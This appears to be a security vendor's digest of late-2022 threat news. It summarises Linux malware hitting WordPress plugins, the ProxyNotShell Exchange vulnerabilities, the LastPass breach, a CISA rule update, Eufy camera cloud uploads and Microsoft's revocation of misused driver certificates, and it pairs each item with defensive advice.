Bleeping Computer and other sources reported that a previously unidentified Linux malware has been exploiting vulnerabilities in numerous outdated WordPress plugins and themes through the insertion of malicious JavaScript. This malware targets 32-bit and 64-bit Linux systems and grants the operator remote command abilities, according to a report by antivirus vendor Dr. Web. The trojan uses a set of hardcoded exploits that run continuously until one of them is successful. To defend against this threat, WordPress website admins should update to the latest available versions of the plugins and themes active on their site and replace those that are no longer developed/supported with reputable alternatives


Sources

https://linuxsecurity.com/news/hackscracks/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites#:~:text=A%20previously%20unknown%20Linux%20malware,its%20operator%20remote%20command%20capabilities

https://www.bleepingcomputer.com/news/security/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites/ 

Overview

In September of 2022, GTSC reported a critical infrastructure attack that took place in August of 2022. The investigation revealed that the threat actor used two zero-day vulnerabilities in Microsoft Exchange Server in the attack. The vulnerabilities were later identified as CVE-2022-41040 and CVE-2022-41082. The exploitation of these two vulnerabilities was used to create a backdoor on a vulnerable server and perform lateral movement.

The discovery of CVE-2022-41040 and CVE-2022-41082, dubbed by the cybersecurity community as ProxyNotShell, led Microsoft to release two patches to cover the vulnerabilities.

Blackpoint Cyber notified its partners that it is actively monitoring the CVE-2022-41080 and CVE-2022-41082 vulnerabilities exploited in tandem to bypass previous Microsoft Exchange ProxyNotShell (CVE-2022-41040) mitigations, which allow access to unauthorized internal resources. Previously, the mitigation step issued by the GTSC was to complete the temporary containment measures. However, this new attack chain can be used to bypass the recommended URL request blocking mitigations, making it critical to make sure servers are patched.

To mitigate this risk, organizations are advised to patch systems using Microsoft’s latest November 2022 latest patch releases for all three vulnerabilities.

Sources

Overview

LastPass updated its security incident notice to provide new details about the data breach it has been investigating since November of 2022. The update revealed that the threat actor targeted an employee using information obtained from a data breach that occurred in August of 2022. Using credentials and keys obtained from the employee, the threat actor decrypted storage volumes within their cloud-based storage service. The storage volumes contained basic customer account information and related metadata. While the threat actor was able to copy a backup of customer vault data containing both encrypted and unencrypted data, the encrypted data can only be decrypted with a unique encryption key derived from a user’s master password. It’s believed to be extremely unlikely that the threat actor will successfully crack the master password due to computational limitations– if users followed the recommended password requirements given by LastPass.

In response to the LastPass update, Arctic Wolf issued the following recommendations:

Recommendation #1: Delete Existing SAML Integration If you received an email from LastPass stating that your organization leverages an impacted API-based integration, we strongly recommend following LastPass’ recommendation to delete existing SAML integrations. To view your existing SAML integrations and delete them follow this support guide provided by LastPass: https://support.lastpass.com/help/how-do-i-delete-an-existing-saml-integration

Recommendation #2: Provide User Awareness Training Provide tailored user awareness training to all employees around the LastPass data breach. Ensure users know how to identify a phishing email and where to report it. Furthermore, provide examples on what users could expect and to remind users to remain vigilant when receiving an email from an unknown or external source.

Recommendation #3: Consider Resetting Master Password If a user’s master password is reused or does not meet the minimum password requirements provided by LastPass, reset the user’s master password to prevent potential future impacts if the master password is brute forced or leaked in a credential list.


Sources

Overview

The Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA) amended the Protected Critical Infrastructure Information (PCII) Program regulation with non-substantive, technical edits. The goals of these changes are to improve and modernize aspects of the PCII Program and to help critical infrastructure owners/operators, state and local governments, and other important stakeholders more effectively use the PCII Program.


Sources

https://www.cisa.gov/blog/2022/12/21/cisa-publishes-technical-rule-update-protected-critical-infrastructure-information

Overview

Eufy, a security camera produced by Anker, has been flagged for sending footage to the cloud, after claiming the recorded data is stored on the physical device itself. However, in order to notify users of the footage, a thumbnail is sent which includes images of faces, used for facial recognition, and other data, through the cloud. There is an option to turn off this functionality, but users still found data nonconsensually saved this way. Even when the option is toggled off, the thumbnail data is still accessible through the server.Eufy commented on the incident stating all data is never public and requires a URL to view, along with correct credentials and a time-sensitive link. The only fix as of now is to update the terms of language used with customers and owners of the cameras.

Sources

https://www.macrumors.com/2022/11/29/eufy-camera-cloud-uploads-no-user-consent/

https://www.theverge.com/2022/11/30/23486753/anker-eufy-security-camera-cloud-private-encryption-authentication-storage

Overview

Microsoft completed its investigation regarding the Microsoft Windows Hardware Developer Program-certified drivers that were being used maliciously in post-exploitation activity. The investigation, which was launched in late October of 2022, determined that the activity was limited in nature and no compromise was identified. To protect customers from the threat, Microsoft released Windows Security Updates to revoke the certificate for impacted files, suspended the partners’ seller accounts, and deployed blocking detections (Microsoft Defender 1.377.987.0 and newer).


Source

https://msrc.microsoft.com/update-guide/vulnerability/ADV220005

This option is available in Premium Addons Pro.
Join Our Newsletter

Download the "How Strong is Your Cybersecurity Culture?" Checklist!

Name(Required)